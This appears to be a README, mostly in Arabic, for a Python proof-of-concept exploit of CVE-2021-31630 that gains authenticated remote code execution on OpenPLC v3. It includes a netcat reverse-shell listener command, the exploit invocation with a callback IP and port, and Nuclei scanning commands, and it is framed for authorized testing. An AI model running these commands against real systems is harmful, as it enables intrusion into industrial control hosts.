
Python 3.13+ proof-of-concept exploit for CVE-2021-31630, enabling authenticated remote code execution on OpenPLC v3 via malicious hardware layer upload. Includes Nuclei detection templates for default credentials and vulnerability checks.
هذا هو استغلال (Proof-of-Concept) حديث ومتوافق مع بايثون 3.13+ لثغرة CVE-2021-31630، وهي ثغرة في OpenPLC v3 تسمح لمستخدم مُصادَق عليه برفع طبقة عتاد مخصصة تحتوي على كود خبيث، مما يؤدي إلى تنفيذ أوامر عن بُعد (RCE) على المضيف.
الاكتشاف الأصلي للثغرة والنشرة الأمنية من إعداد Fellipe Oliveira. تستخدم هذه الإعادة التنفيذ والتحديث مكتبة httpx، وأدوات سطر الأوامر، والسجلات (logging)، وتقنيات كشف أكثر أمانًا.
nc -lvnp 9001
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001
خيارات إضافية:
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080
يقوم القالب الثاني بتسجيل الدخول ومحاولة رفع حمولة غير ضارة + ترجمتها للتأكد من احتمالية وجود الثغرة — دون تشغيل تنفيذ فعلي للأكواد.
هذا الكود مخصص للأغراض التعليمية واختبارات الاختراق المصرح بها فقط. لا تستخدمه دون إذن صريح من مالك النظام.